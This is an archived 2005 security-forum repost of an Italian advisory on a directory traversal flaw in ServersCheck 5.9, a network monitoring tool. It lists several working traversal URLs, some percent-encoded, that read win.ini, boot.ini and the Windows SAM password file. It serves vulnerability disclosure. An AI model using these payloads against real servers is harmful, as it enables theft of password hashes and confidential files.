邪恶八进制信息安全团队技术讨论组's Archiver

EvilOctal 2005-5-31 13:15

[转载]serverscheck 5.9 trasversal 地址漏洞

信息来源:[url]www.serverscheck.com[/url]

-descrizione del prodotto:

"ServersCheck is a network monitoring, reporting and alerting tool.
It monitors the availability of networked devices and computer systems
(Windows, Unix, Linux, MacOS,...). ServersCheck runs on Windows 2000, 2003
and
XP"


-vulnerabilità:

directory trasversal bug - permette a un utente definito dall'amministratore
di navigare all'interno della macchina e procurarsi file di password,
informazioni riservate. Al momento non è disponibile alcuna patch.


-exploit:

alcuni check con esito positivo:

[url]http://localhost:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini[/url]
[url]http://localhost:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boo[/url]
t.ini
[url]http://localhost:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam[/url]
[url]http://localhost:1272/.../.../.../.../.../.../.../.../.../boot.ini[/url]
[url]http://localhost:1272/../../../../../../../../../boot.ini[/url]
[url]http://localhost:1272/../../../../../../../../boot.ini[/url]
[url]http://localhost:1272/../../../../boot.ini[/url]

页: [1]
© 1999-2008 EvilOctal Security Team